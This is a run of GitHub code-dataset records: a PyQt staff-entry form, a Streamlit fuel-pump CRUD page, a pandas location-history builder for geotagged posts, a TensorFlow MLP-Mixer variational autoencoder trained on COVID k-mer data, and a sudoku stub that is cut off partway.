QtGui.QFont()\n font.setPointSize(11)\n self.lblCognome.setFont(font)\n self.lblCognome.setObjectName(\"lblCognome\")\n self.lblCodiceFiscale = QtWidgets.QLabel(self.centralwidget)\n self.lblCodiceFiscale.setGeometry(QtCore.QRect(130, 230, 141, 31))\n font = QtGui.QFont()\n font.setPointSize(11)\n self.lblCodiceFiscale.setFont(font)\n self.lblCodiceFiscale.setObjectName(\"lblCodiceFiscale\")\n self.txtCodiceFiscale = QtWidgets.QLineEdit(self.centralwidget)\n self.txtCodiceFiscale.setGeometry(QtCore.QRect(280, 230, 151, 31))\n self.txtCodiceFiscale.setObjectName(\"txtCodiceFiscale\")\n self.lblOre = QtWidgets.QLabel(self.centralwidget)\n self.lblOre.setGeometry(QtCore.QRect(120, 270, 151, 31))\n font = QtGui.QFont()\n font.setPointSize(11)\n self.lblOre.setFont(font)\n self.lblOre.setObjectName(\"lblOre\")\n self.txtOre = QtWidgets.QLineEdit(self.centralwidget)\n self.txtOre.setGeometry(QtCore.QRect(280, 270, 151, 31))\n self.txtOre.setObjectName(\"txtOre\")\n self.lblTitolo = QtWidgets.QLabel(self.centralwidget)\n self.lblTitolo.setGeometry(QtCore.QRect(120, 310, 151, 31))\n font = QtGui.QFont()\n font.setPointSize(11)\n self.lblTitolo.setFont(font)\n self.lblTitolo.setObjectName(\"lblTitolo\")\n self.btnAnnulla = QtWidgets.QPushButton(self.centralwidget)\n self.btnAnnulla.setGeometry(QtCore.QRect(260, 370, 131, 31))\n self.btnAnnulla.setObjectName(\"btnAnnulla\")\n self.btnSalva = QtWidgets.QPushButton(self.centralwidget)\n self.btnSalva.setGeometry(QtCore.QRect(400, 370, 121, 31))\n self.btnSalva.setObjectName(\"btnSalva\")\n self.txtCognome = QtWidgets.QLineEdit(self.centralwidget)\n self.txtCognome.setGeometry(QtCore.QRect(280, 190, 151, 31))\n self.txtCognome.setObjectName(\"txtCognome\")\n self.txtTitolo = QtWidgets.QLineEdit(self.centralwidget)\n self.txtTitolo.setGeometry(QtCore.QRect(280, 310, 151, 31))\n self.txtTitolo.setObjectName(\"txtTitolo\")\n self.btnIndietro = QtWidgets.QPushButton(self.centralwidget)\n self.btnIndietro.setGeometry(QtCore.QRect(530, 370, 131, 31))\n self.btnIndietro.setObjectName(\"pushButton\")\n MainWindow.setCentralWidget(self.centralwidget)\n self.menubar = QtWidgets.QMenuBar(MainWindow)\n self.menubar.setGeometry(QtCore.QRect(0, 0, 670, 26))\n self.menubar.setObjectName(\"menubar\")\n MainWindow.setMenuBar(self.menubar)\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\n self.statusbar.setObjectName(\"statusbar\")\n MainWindow.setStatusBar(self.statusbar)\n self.retranslateUi(MainWindow)\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\n\n self.btnSalva.clicked.connect(self.salva_nuovo_dipendente)\n self.btnAnnulla.clicked.connect(self.cancella_riempimento)\n self.btnIndietro.clicked.connect(self.view_aggiungi_staff.close)\n\n def retranslateUi(self, MainWindow):\n _translate = QtCore.QCoreApplication.translate\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"Assunzione\"))\n self.lblTitle.setText(_translate(\"MainWindow\",\n \"

Aggiungi un membro dello staff

\"))\n self.lblNome.setText(_translate(\"MainWindow\", \"Nome\"))\n self.lblCognome.setText(_translate(\"MainWindow\", \"Cognome\"))\n self.lblCodiceFiscale.setText(_translate(\"MainWindow\", \"Codice fiscale\"))\n self.lblOre.setText(_translate(\"MainWindow\", \"Ore settimanali\"))\n self.lblTitolo.setText(_translate(\"MainWindow\", \"

Mansione

\"))\n self.btnAnnulla.setText(_translate(\"MainWindow\", \"Cancella\"))\n self.btnSalva.setText(_translate(\"MainWindow\", \"Salva\"))\n self.btnIndietro.setText(_translate(\"MainWindow\", \"Indietro\"))\n","repo_name":"LosaMatteo/ProgettoPalestra","sub_path":"Staff/View/ViewAggiungiStaff.py","file_name":"ViewAggiungiStaff.py","file_ext":"py","file_size_in_byte":6827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"14677635592","text":"import streamlit as st;\r\nimport controllers.bombaController as bombaController\r\nimport Paginas.bomba.cadastrar_bomba as paginaCadastrarBomba\r\n\r\n\r\ndef consulta_bomba():\r\n parametroId = st.experimental_get_query_params()\r\n if parametroId.get(\"Id\") == None:\r\n st.experimental_set_query_params()\r\n st.title(\"Consultar Bomba\") \r\n colunas = st.columns((1, 2, 2, 1.5))\r\n campos = ['Id Bomba', 'Id Combustível', 'Excluir', 'Alterar']\r\n for col, campo_nome in zip(colunas, campos):\r\n col.write(campo_nome)\r\n\r\n for item in bombaController.selecionarBomba():\r\n col1, col2, col3, col4 = st.columns((1, 2, 2, 1.5))\r\n col1.write(item.bomba_id)\r\n col2.write(item.combustivel_id)\r\n botao_espaco_excluir = col3.empty()\r\n botao_excluir = botao_espaco_excluir.button('Excluir', 'btnExcluir' + str(item.bomba_id))\r\n botao_espaco_alterar = col4.empty()\r\n botao_alterar = botao_espaco_alterar.button('Alterar', 'btnAlterar' + str(item.bomba_id))\r\n\r\n if botao_excluir:\r\n bombaController.excluirBomba(item.bomba_id)\r\n botao_espaco_excluir.button('Excluído', 'btnExcluir1' + str(item.bomba_id))\r\n if botao_alterar:\r\n st.experimental_set_query_params(\r\n Id=[item.bomba_id]\r\n )\r\n st.experimental_rerun()\r\n else:\r\n botaoVoltar = st.button(\"Voltar\")\r\n if botaoVoltar:\r\n st.experimental_set_query_params()\r\n st.experimental_rerun()\r\n\r\n paginaCadastrarBomba.cadastrar_bomba()","repo_name":"tSantosDev/crud-python-streamlit","sub_path":"Paginas/bomba/consulta_bomba.py","file_name":"consulta_bomba.py","file_ext":"py","file_size_in_byte":1646,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"43567393617","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nThis script collects location history per user into tuples containing UTC\r\ntimestamp and coordinates. This script should be run before reverse geocoding.\r\n\r\nUsage:\r\n Execute the script from the command line using the following command:\r\n\r\n python3 reverse_geocode.py -i input.pkl -o output.pkl\r\n\r\nArguments:\r\n -i/--input: Path to the pandas DataFrame containing posts.\r\n -o/--output: Path to the output pandas DataFrame containing location\r\n histories.\r\n -c/--column: Name of the timestamp column\r\n -lt/--localtime: Specify whether local time column is added into\r\n dataframe. If local time is not required, don't use -lt flag.\r\n\r\nOutput:\r\n A pandas DataFrame containing the location histories of users.\r\n\"\"\"\r\n\r\nimport pandas as pd\r\nimport argparse\r\nimport pytz\r\n\r\n# Set up the argument parser\r\nap = argparse.ArgumentParser()\r\n\r\n# Define arguments\r\nap.add_argument(\"-i\", \"--input\", required=True,\r\n help=\"Path to the DataFrame containing geotagged posts.\")\r\nap.add_argument(\"-o\", \"--output\", required=True,\r\n help=\"Path to the output dataframe with location history.\")\r\nap.add_argument(\"-c\", \"--column\", required=False,\r\n help=\"The name of the column containing the UTC timestamp\")\r\nap.add_argument(\"-lt\", \"--localtime\", required=False,\r\n help=\"Specify whether time_created_local column is created\")\r\n\r\n\r\n# Parse arguments\r\nargs = vars(ap.parse_args())\r\n\r\n# Check if DataFrame input column has been set manually\r\nif args['column'] is not None:\r\n inputcol = args['column']\r\nelse:\r\n inputcol = 'time_created_utc'\r\n\r\n# Assign arguments to variables\r\nprint('[INFO] - Reading pickled input dataframe in')\r\ninput_df = pd.read_pickle(args['input'])\r\n\r\n# Retrieve original input dataframe columns\r\ncollist = list(input_df.columns)\r\n\r\n# Create timestamp and location tuples\r\nprint('[INFO] - Creating time and coordinate tuples')\r\ninput_df['date_loc'] = None # create empty series\r\ninput_df['date_loc'] = input_df['date_loc'].astype(object) # force object dtype\r\nfor i, row in input_df.iterrows():\r\n input_df.at[i, 'date_loc'] = tuple([row[inputcol], row.geometry])\r\n\r\n# input_df['date_loc'] = input_df[[inputcol,'geometry']].apply(tuple, axis=1)\r\n\r\n# Group by user_id and create sorted location history\r\nprint('[INFO] - Grouping location history per user')\r\ngrp = input_df.groupby('user_id', as_index=False).agg(lambda x: list(x))\r\ngrp['location_hist'] = grp['date_loc'].apply(sorted)\r\n\r\n# Merge dataframes on user_id\r\nprint('[INFO] - Joining location histories to user ids')\r\nmerged = pd.merge(input_df, grp, on='user_id', sort=False, suffixes=('', '_y'))\r\n\r\n# Finalize column list for output\r\ncollist.extend(['location_hist'])\r\n\r\n# Join location history series to dataframe by user_id\r\noutput_df = merged[collist]\r\n\r\n# Check whether local time zone was requested\r\nif args['localtime'] is not None:\r\n print('[INFO] - Local time stamps requested!')\r\n # Convert the datetime in the column 'time_created_utc' to local time\r\n # (GMT+2). Begin by defining the source and target zones.\r\n from_zone = pytz.timezone('UTC')\r\n to_zone = pytz.timezone('Europe/Helsinki') # change this to your timezone if needed\r\n print('[INFO] - Creating local time stamps...')\r\n # Loop over output dataframe\r\n for ix, row in output_df.iterrows():\r\n # Fetch the datetime\r\n time_created_utc = row['time_created_utc']\r\n\r\n # Tell the naive datetime that it's UTC\r\n time_created_utc = time_created_utc.replace(tzinfo=from_zone)\r\n\r\n # Convert the datetime to local timezone\r\n time_created_local = time_created_utc.astimezone(to_zone)\r\n\r\n # Add local time\r\n output_df.at[ix, 'time_created_local'] = time_created_local\r\nelse:\r\n print('[INFO] - No local time stamps requested, moving on...')\r\n pass\r\n\r\n# Save output dataframe as pickle\r\nprint('[INFO] - Saving output dataframe to pickle')\r\noutput_df.to_pickle(args['output'])\r\nprint('[INFO] - ... Done!')\r\n","repo_name":"DigitalGeographyLab/some-lingscapes","sub_path":"spatial/location_history_creator.py","file_name":"location_history_creator.py","file_ext":"py","file_size_in_byte":4026,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"2"} +{"seq_id":"35950760844","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\nfrom joblib import dump\nfrom sklearn import preprocessing as pr\n\nimport tensorflow as tf\nimport tensorflow_addons as tfa\n\nfrom tensorflow import keras\nfrom tensorflow.keras import backend as K \nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.optimizers import Adam\nfrom tensorflow.keras.layers import Input, Activation\nfrom tensorflow.keras.layers import Conv2D, Dense, Layer, BatchNormalization\nfrom tensorflow.keras.layers import Flatten, Reshape, LayerNormalization, GlobalAveragePooling1D\n\nglobalSeed=768\nfrom numpy.random import seed \nseed(globalSeed)\ntf.compat.v1.set_random_seed(globalSeed)\n\n#This piece of code is only used if you have a Nvidia RTX or GTX1660 TI graphics card\n#for some reason convolutional layers do not work poperly on those graphics cards \n\ngpus= tf.config.experimental.list_physical_devices('GPU')\ntf.config.experimental.set_memory_growth(gpus[0], True)\n\n###############################################################################\n# Visualization functions\n###############################################################################\n\ndef PlotStyle(Axes): \n \"\"\"\n Parameters\n ----------\n Axes : Matplotlib axes object\n Applies a general style to the matplotlib object\n\n Returns\n -------\n None.\n \"\"\" \n Axes.spines['top'].set_visible(False)\n Axes.spines['bottom'].set_visible(True)\n Axes.spines['left'].set_visible(True)\n Axes.spines['right'].set_visible(False)\n Axes.xaxis.set_tick_params(labelsize=12)\n Axes.yaxis.set_tick_params(labelsize=12)\n\n###############################################################################\n# Network definition\n###############################################################################\n\nclass KLDivergenceLayer(Layer):\n '''\n Custom KL loss layer\n '''\n def __init__(self,*args,**kwargs):\n self.annealing = tf.Variable(10**-16,dtype=tf.float32,trainable = False)\n self.is_placeholder=True\n super(KLDivergenceLayer,self).__init__(*args,**kwargs)\n \n def call(self,inputs):\n \n Mu,LogSigma=inputs\n klbatch=-0.5*self.annealing*K.sum(1+LogSigma-K.square(Mu)-K.exp(LogSigma),axis=-1)\n self.add_loss(K.mean(klbatch),inputs=inputs)\n self.add_metric(klbatch,name='kl_loss',aggregation='mean')\n \n return inputs\n\nclass Sampling(Layer):\n '''\n Custom sampling layer\n '''\n def __init__(self, **kwargs):\n super().__init__(**kwargs)\n \n def get_config(self):\n config = {}\n base_config = super().get_config()\n return {**base_config, **config}\n \n @tf.autograph.experimental.do_not_convert \n def call(self,inputs,**kwargs):\n \n Mu,LogSigma=inputs\n batch=tf.shape(Mu)[0]\n dim=tf.shape(Mu)[1]\n epsilon=K.random_normal(shape=(batch,dim))\n\n return Mu+(K.exp(0.5*LogSigma))*epsilon\n\nclass SpatialAttention(Layer):\n '''\n Custom Spatial attention layer\n '''\n \n def __init__(self,size, **kwargs):\n super(SpatialAttention, self).__init__()\n self.size = size\n self.kwargs = kwargs\n \n def get_config(self):\n cfg = super().get_config()\n return cfg \n\n\n def build(self, input_shapes):\n self.conv = Conv2D(filters=1, kernel_size=self.size, strides=1, padding='same')\n\n def call(self, inputs):\n pooled_channels = tf.concat(\n [tf.math.reduce_max(inputs, axis=3, keepdims=True),\n tf.math.reduce_mean(inputs, axis=3, keepdims=True)],\n axis=3)\n\n scale = self.conv(pooled_channels)\n scale = tf.math.sigmoid(scale)\n\n return inputs * scale\n \n\nclass Patches(Layer):\n '''\n Taken from\n https://keras.io/examples/vision/mlp_image_classification/\n '''\n def __init__(self, patch_size, num_patches):\n super(Patches, self).__init__()\n self.patch_size = patch_size\n self.num_patches = num_patches\n \n def get_config(self):\n cfg = super().get_config()\n return cfg \n \n @tf.autograph.experimental.do_not_convert\n def call(self, images,**kwargs):\n \n batch_size = tf.shape(images)[0]\n patches = tf.image.extract_patches(\n images=images,\n sizes=[1, self.patch_size, self.patch_size, 1],\n strides=[1, self.patch_size, self.patch_size, 1],\n rates=[1, 1, 1, 1],\n padding=\"VALID\",\n )\n patch_dims = patches.shape[-1]\n patches = tf.reshape(patches, [batch_size, self.num_patches, patch_dims])\n return patches\n\n\nclass MLPMixerLayer(Layer):\n '''\n Taken from\n https://keras.io/examples/vision/mlp_image_classification/\n '''\n def __init__(self, num_patches, hidden_units, dropout_rate, *args, **kwargs):\n super(MLPMixerLayer, self).__init__(*args, **kwargs)\n\n self.mlp1 = keras.Sequential(\n [\n Dense(units=num_patches),\n BatchNormalization(),\n tfa.layers.GELU(approximate=True),\n BatchNormalization(),\n Dense(units=num_patches),\n ]\n )\n self.mlp2 = keras.Sequential(\n [\n Dense(units=num_patches),\n BatchNormalization(),\n tfa.layers.GELU(approximate=True),\n Dense(units=hidden_units),\n BatchNormalization(),\n ]\n )\n self.normalize = LayerNormalization(epsilon=1e-6)\n \n def get_config(self):\n cfg = super().get_config()\n return cfg \n \n @tf.autograph.experimental.do_not_convert\n def call(self, inputs,**kwargs):\n # Apply layer normalization.\n x = self.normalize(inputs)\n # Transpose inputs from [num_batches, num_patches, hidden_units] to [num_batches, hidden_units, num_patches].\n x_channels = tf.linalg.matrix_transpose(x)\n # Apply mlp1 on each channel independently.\n mlp1_outputs = self.mlp1(x_channels)\n # Transpose mlp1_outputs from [num_batches, hidden_dim, num_patches] to [num_batches, num_patches, hidden_units].\n mlp1_outputs = tf.linalg.matrix_transpose(mlp1_outputs)\n # Add skip connection.\n x = mlp1_outputs + inputs\n # Apply layer normalization.\n x_patches = self.normalize(x)\n # Apply mlp2 on each patch independtenly.\n mlp2_outputs = self.mlp2(x_patches)\n # Add skip connection.\n x = x + mlp2_outputs\n return x\n\n#Wrapper function, creates a small Functional keras model \n#Bottleneck of the variational autoencoder \ndef MakeVariationalNetwork(Latent):\n \n InputFunction=Input(shape=(Latent,))\n Mu=Dense(Latent)(InputFunction)\n LogSigma=Dense(Latent)(InputFunction)\n Mu,LogSigma=KLDivergenceLayer()([Mu,LogSigma])\n Output=Sampling()([Mu,LogSigma])\n variationalBottleneck=Model(inputs=InputFunction,outputs=Output)\n \n return InputFunction,variationalBottleneck\n\ndef MakeBottleneck(InputShape,Latent,UpSampling=False):\n '''\n Parameters\n ----------\n InputShape : tuple\n input shape of the previous convolutional layer.\n Latent : int\n Dimentionality of the latent space.\n UpSampling : bool, optional\n Controls the sampling behaviour of the network.\n The default is False.\n\n Returns\n -------\n InputFunction : Keras functional model input\n input of the network.\n localCoder : Keras functional model\n Coder model, transition layer of the bottleneck.\n\n '''\n \n Units=[np.product(InputShape),Latent]\n \n if UpSampling:\n finalUnits=Units[::-1]\n InputFunction=Input(shape=(Latent,))\n X=Dense(finalUnits[0],use_bias=False)(InputFunction)\n \n else:\n finalUnits=Units\n InputFunction=Input(shape=InputShape)\n X=Flatten()(InputFunction)\n X=Dense(finalUnits[0],use_bias=False)(X)\n \n \n X=BatchNormalization()(X)\n X=Activation('relu')(X)\n X=Dense(finalUnits[1],use_bias=False)(X)\n X=BatchNormalization()(X)\n \n if UpSampling:\n X=Activation('relu')(X)\n Output=Reshape(InputShape)(X)\n else:\n Output=Activation('relu')(X)\n \n Bottleneck=Model(inputs=InputFunction,outputs=Output)\n \n return InputFunction,Bottleneck\n\ndef MakeMixerBlock(inputs,blocks,patch_size,num_patches,embedding_dim,dropout_rate):\n '''\n Parameters\n ----------\n inputs : keras layer\n Input of the mixer block.\n blocks : keras sequential model\n mixer blocks.\n patch_size : int\n size of the image patch, same for each dimention.\n num_patches : int\n number of patches per image.\n embedding_dim : int\n size of the embedding dimention in the mixer block.\n dropout_rate : float\n droput rate in the mixer block.\n\n Returns\n -------\n representation : keras layer \n DESCRIPTION.\n\n '''\n \n patches = Patches(patch_size, num_patches)(inputs)\n x = Dense(units=embedding_dim,use_bias=False)(patches)\n x = blocks(x)\n x = GlobalAveragePooling1D()(x)\n x = BatchNormalization()(x)\n reshapeDim = np.sqrt(embedding_dim).astype(int)\n representation = Reshape((reshapeDim,reshapeDim,1))(x)\n \n return representation\n\ndef MakeMixerCoder(InputShape,Units,NumBlocks,DropoutRate=0.2,UpSampling=False):\n '''\n Parameters\n ----------\n InputShape : tuple\n Input shape of the network.\n Units : array-like\n Contains the dimentionality of the embedding dimentions.\n NumBlocks : int\n Number of mixer blocks.\n DropoutRate : float, optional\n Dropout rate of the mixer block. The default is 0.2.\n PatchSize : int, optional\n size of the segmented patch in the image. The default is 4.\n UpSampling : bool, optional\n Controls the upsamplig or downsampling behaviour of the network.\n The default is False.\n\n Returns\n -------\n InputFunction : Keras functional model input\n input of the network.\n localCoder : Keras functional model\n Coder model, main body of the autoencoder.\n\n '''\n \n if UpSampling:\n EmbeddingDimentions=Units[::-1]\n else:\n EmbeddingDimentions=Units\n \n currentSize = np.sqrt(EmbeddingDimentions[0]).astype(int)\n PatchSize = currentSize//2\n num_patches = (currentSize//PatchSize)**2\n \n InputFunction = Input(shape = InputShape)\n X = SpatialAttention(3)(InputFunction)\n X = BatchNormalization()(X)\n MBlocks = keras.Sequential(\n [MLPMixerLayer(num_patches, EmbeddingDimentions[0], DropoutRate) for _ in range(NumBlocks)]\n )\n \n X = MakeMixerBlock(X,MBlocks,PatchSize,num_patches,EmbeddingDimentions[0],DropoutRate)\n\n for k in range(1,len(EmbeddingDimentions)):\n \n currentSize = np.sqrt(EmbeddingDimentions[k-1]).astype(int)\n PatchSize = currentSize//2\n num_patches = (currentSize//PatchSize)**2\n \n X = SpatialAttention(3)(X)\n X = BatchNormalization()(X)\n MBlocks = keras.Sequential(\n [MLPMixerLayer(num_patches, EmbeddingDimentions[k], DropoutRate) for _ in range(NumBlocks)]\n )\n X = MakeMixerBlock(X,MBlocks,PatchSize,num_patches,EmbeddingDimentions[k],DropoutRate)\n \n\n if UpSampling:\n Output = Activation('sigmoid')(X)\n localCoder = Model(inputs=InputFunction,outputs=Output)\n \n else:\n localCoder = Model(inputs=InputFunction,outputs=X)\n \n return InputFunction,localCoder\n\n#Wrapper function joins the Coder function and the bottleneck function \n#to create a simple autoencoder\ndef MakeMixerAutoencoder(InputShape,Units,BlockSize):\n \n InputEncoder,Encoder=MakeMixerCoder(InputShape,Units,BlockSize)\n #Encoder.summary()\n EncoderOutputShape=Encoder.layers[-1].output_shape\n BottleneckInputShape=EncoderOutputShape[1::]\n InputBottleneck,Bottleneck=MakeBottleneck(BottleneckInputShape,2)\n ConvEncoderOutput=Bottleneck(Encoder(InputEncoder))\n \n ConvEncoder=Model(inputs=InputEncoder,outputs=ConvEncoderOutput)\n \n rInputBottleneck,rBottleneck=MakeBottleneck(BottleneckInputShape,2,UpSampling=True)\n InputDecoder,Decoder=MakeMixerCoder(BottleneckInputShape,Units,BlockSize,UpSampling=True)\n ConvDecoderOutput=Decoder(rBottleneck(rInputBottleneck))\n ConvDecoder=Model(inputs=rInputBottleneck,outputs=ConvDecoderOutput)\n \n ConvAEoutput=ConvDecoder(ConvEncoder(InputEncoder))\n ConvAE=Model(inputs=InputEncoder,outputs=ConvAEoutput)\n \n return InputEncoder,InputDecoder,ConvEncoder,ConvDecoder,ConvAE\n\n# Wrapper functon, joins the autoencoder function with the custom variational\n#layers to create an autoencoder\ndef MakeMixerVariationalAutoencoder(InputShape,Units,BlockSize):\n \n InputEncoder,InputDecoder,ConvEncoder,ConvDecoder,_=MakeMixerAutoencoder(InputShape,Units,BlockSize)\n \n InputVAE,VAE=MakeVariationalNetwork(2)\n VAEencoderOutput=VAE(ConvEncoder(InputEncoder))\n ConvVAEencoder=Model(inputs=InputEncoder,outputs=VAEencoderOutput)\n \n VAEOutput=ConvDecoder(ConvVAEencoder(InputEncoder))\n ConvVAEAE=Model(inputs=InputEncoder,outputs=VAEOutput)\n \n return InputEncoder,InputDecoder,ConvVAEencoder,ConvDecoder,ConvVAEAE\n\n###############################################################################\n# Auxiliary functions\n###############################################################################\n\n#Custom callback, scales the KL-loss \nclass KLAnnealing(keras.callbacks.Callback):\n\n def __init__(self,position, weigths):\n super().__init__()\n self.position = position\n self.weigths = tf.Variable(weigths,trainable=False,dtype=tf.float32)\n\n def on_epoch_end(self, epoch,logs=None):\n \n weights = self.model.get_weights()\n weights[self.position] = self.weigths[epoch]\n self.model.set_weights(weights)\n\n\ndef MakeAnnealingWeights(epochs,cycles,scale=1):\n '''\n Parameters\n ----------\n epochs : int\n min size of the array to return.\n cycles : int\n number of annealing cycles.\n scale : float, optional\n scales the annealing weights. The default is 1.\n\n Returns\n -------\n array\n annealing weights.\n\n '''\n \n pointspercycle = epochs//cycles\n AnnealingWeights = 1*(1/(1+np.exp(-1*np.linspace(-10,10,num=pointspercycle))))\n \n for k in range(cycles-1):\n AnnealingWeights = np.append(AnnealingWeights,1*(1/(1+np.exp(-1*np.linspace(-10,10,num=pointspercycle+1)))))\n \n return scale*AnnealingWeights\n\n###############################################################################\n# Data loading \n###############################################################################\n\nfoldsPath = r'/media/tavoglc/Datasets/datasets/main/splits'\n\nTrainFolds = pd.read_csv(foldsPath+'/train.csv')\nTestFolds = pd.read_csv(foldsPath+'/test.csv')\nValidation = pd.read_csv(foldsPath+'/validation.csv')\n\nComplete = pd.read_csv(foldsPath+'/complete.csv')\n\nDataPath = r\"/media/tavoglc/Datasets/datasets/DABE/LifeSciences/COVIDSeqs/nov2021\"\nDataDir = DataPath+'/KmerDataExt.csv'\n\noutputPath = r'/media/tavoglc/Datasets/datasets/main/models/Model02'\n\n###############################################################################\n# Data selection\n###############################################################################\n\nKmerData = pd.read_csv(DataDir)\nKmerData['id'] = [val[0:-2] for val in KmerData['id']]\nKmerData = KmerData.set_index('id')\n\n###############################################################################\n# Network hyperparameters\n###############################################################################\n\nArch = [37**2,(37//2)**2,(37//4)**2,(37//8)**2]\n \nlr = 0.00075\nminlr = 0.000001 \nepochs = 70 \nbatch_size = 256\ndecay=2*(lr-minlr)/epochs\ninShape = (37,37,1)\nsh = 0.00001\nAnnealingWeights = MakeAnnealingWeights(epochs,4,scale=sh)\n\n###############################################################################\n# Kfold cross validation\n###############################################################################\n\nScalersContainer = []\nEncoderContainer = []\nAEContainer = []\nHistoryContainer = []\n\nfoldNames = ['Fold0', 'Fold1', 'Fold2', 'Fold3', 'Fold4']\n\nfor fold in foldNames:\n \n trainLabels = TrainFolds[fold]\n testLabels = TestFolds[fold]\n \n trainData = np.array(KmerData.loc[trainLabels])\n testData = np.array(KmerData.loc[testLabels])\n \n scaler = pr.MinMaxScaler()\n scaler.fit(trainData)\n \n trainData = scaler.transform(trainData)\n testData = scaler.transform(testData)\n \n trainData = np.array([np.array(list(val)+[0,0,0,0,0]).reshape((37,37)) for val in trainData]).reshape((-1,37,37,1))\n testData = np.array([np.array(list(val)+[0,0,0,0,0]).reshape((37,37)) for val in testData]).reshape((-1,37,37,1))\n \n\n datasetTrain = tf.data.Dataset.from_tensor_slices((trainData,trainData))\n datasetTest = tf.data.Dataset.from_tensor_slices((testData,testData))\n \n datasetTrain = datasetTrain.shuffle(buffer_size=100,seed=125)\n datasetTrain = datasetTrain.batch(batch_size)\n datasetTrain = datasetTrain.prefetch(2)\n \n datasetTest = datasetTest.shuffle(buffer_size=100,seed=125)\n datasetTest = datasetTest.batch(batch_size)\n datasetTest = datasetTest.prefetch(2)\n \n _,_,Encoder,Decoder,AE = MakeMixerVariationalAutoencoder(inShape,Arch,1)\n KLAposition = [k for k,val in enumerate(AE.get_weights()) if len(val.shape)==0][0]\n\n AE.compile(Adam(learning_rate=lr,decay=decay),loss='mse')\n history = AE.fit(datasetTrain,epochs=epochs,\n validation_data=datasetTest,callbacks=[KLAnnealing(KLAposition,AnnealingWeights)])\n \n ScalersContainer.append(scaler)\n EncoderContainer.append(Encoder)\n AEContainer.append(AE)\n HistoryContainer.append(history)\n \n dump(scaler,outputPath + '/scaler'+fold+'.joblib')\n AE.save(outputPath + '/AE'+fold+'.h5')\n Encoder.save(outputPath + '/Encoder'+fold+'.h5')\n\n tf.compat.v1.set_random_seed(globalSeed)\n\n###############################################################################\n# Learning curves\n###############################################################################\n\nRepresentationContainer = []\n\nfig,axs = plt.subplots(2,5,figsize=(30,15))\n\nfor k,hist in enumerate(HistoryContainer):\n \n axs[0,k].plot(hist.history['loss'],'k-',label = 'Loss')\n axs[0,k].plot(hist.history['val_loss'],'r-',label = 'Validation Loss')\n axs[0,k].title.set_text('Reconstruction loss')\n PlotStyle(axs[0,k])\n \n axs[1,k].plot(hist.history['kl_loss'],'k-',label = 'Loss')\n axs[1,k].plot(hist.history['val_kl_loss'],'r-',label = 'Validation Loss')\n axs[1,k].title.set_text('Kullback–Leibler loss')\n PlotStyle(axs[1,k])\n \nplt.tight_layout()\nplt.savefig(outputPath+'/figtraining.png')\n\n###############################################################################\n# Latent space visualization\n###############################################################################\n\nvalDataFrame = pd.DataFrame()\nvalDataFrame['ids'] = Validation['validation']\n\nvalidationData = np.array(KmerData.loc[Validation['validation']])\nperformance = []\n\nfig,axs = plt.subplots(1,5,figsize=(30,15))\n\nfor k,block in enumerate(zip(ScalersContainer,EncoderContainer,AEContainer)):\n \n sclr,enc,ae = block\n \n valData = sclr.transform(validationData)\n valData = np.array([np.array(list(val)+[0,0,0,0,0]).reshape((37,37)) for val in valData]).reshape((-1,37,37,1))\n \n datasetVal = tf.data.Dataset.from_tensor_slices((valData,valData))\n datasetVal = datasetVal.batch(batch_size)\n datasetVal = datasetVal.prefetch(2)\n \n performance.append(ae.evaluate(datasetVal))\n VariationalRepresentation = enc.predict(datasetVal)\n valDataFrame['Dim0_model'+str(k)] = VariationalRepresentation[:,0]\n valDataFrame['Dim1_model'+str(k)] = VariationalRepresentation[:,1]\n \n axs[k].scatter(VariationalRepresentation[:,0],VariationalRepresentation[:,1],alpha=0.15)\n axs[k].title.set_text('Latent Space (model = ' + str(k) +')')\n PlotStyle(axs[k])\n\nplt.tight_layout() \nplt.savefig(outputPath+'/figls.png')\n\nvalDataFrame.to_csv(outputPath+'/ValDimReduction.csv')\n\n###############################################################################\n# Out of sample performance \n###############################################################################\n\nplt.figure()\nplt.bar(np.arange(len(performance)),[val[0] for val in performance])\nax = plt.gca()\nax.set_ylabel('Reconstruction Loss',size=13)\nax.set_xlabel('Folds',size=13)\nPlotStyle(ax)\nplt.savefig(outputPath+'/recloss.png')\n\n\nplt.figure()\nplt.bar(np.arange(len(performance)),[val[1] for val in performance])\nax = plt.gca()\nax.set_ylabel('KL Loss',size=13)\nax.set_xlabel('Folds',size=13)\nPlotStyle(ax)\nplt.savefig(outputPath+'/KLloss.png')\n\n###############################################################################\n# Complete metadata dataset \n###############################################################################\n\ncompleteDataFrame = pd.DataFrame()\ncompleteDataFrame['ids'] = Complete['complete']\n\ncompleteData = np.array(KmerData.loc[Complete['complete']])\n\nfor k,block in enumerate(zip(ScalersContainer,EncoderContainer,AEContainer)):\n \n sclr,enc,ae = block\n \n comData = sclr.transform(completeData)\n comData = np.array([np.array(list(val)+[0,0,0,0,0]).reshape((37,37)) for val in comData]).reshape((-1,37,37,1))\n datasetCom = tf.data.Dataset.from_tensor_slices((comData,comData))\n \n datasetCom = datasetCom.batch(batch_size)\n datasetCom = datasetCom.prefetch(2)\n \n VariationalRepresentation = enc.predict(datasetCom)\n \n completeDataFrame['Dim0_model'+str(k)] = VariationalRepresentation[:,0]\n completeDataFrame['Dim1_model'+str(k)] = VariationalRepresentation[:,1]\n \ncompleteDataFrame.to_csv(outputPath+'/CompDimReduction.csv')\n\n","repo_name":"TavoGLC/SlidingSampling","sub_path":"models/Model02.py","file_name":"Model02.py","file_ext":"py","file_size_in_byte":22032,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"21298102275","text":"import copy\n\n\ndef getGroups(mat):\n pass\n\n\ndef reduceGroup(groups):\n \"\"\"return True if can reduce group and False if not\"\"\"\n pass\n\n\ndef reduce(matrix):\n changed = True\n groups = getGroups(matrix)\n\n while changed:\n changed = reduceGroups(groups)\n\n\ndef solutionViable(matrix):\n \"\"\"Check that no set is empty\"\"\"\n for i in range(9):\n for j in range(9):\n if len(matrix[i][j]) == 0:\n return False\n\n return True\n\n\ndef solve(matrix):\n reduce(matrix)\n\n if not solutionViable(matrix):\n return 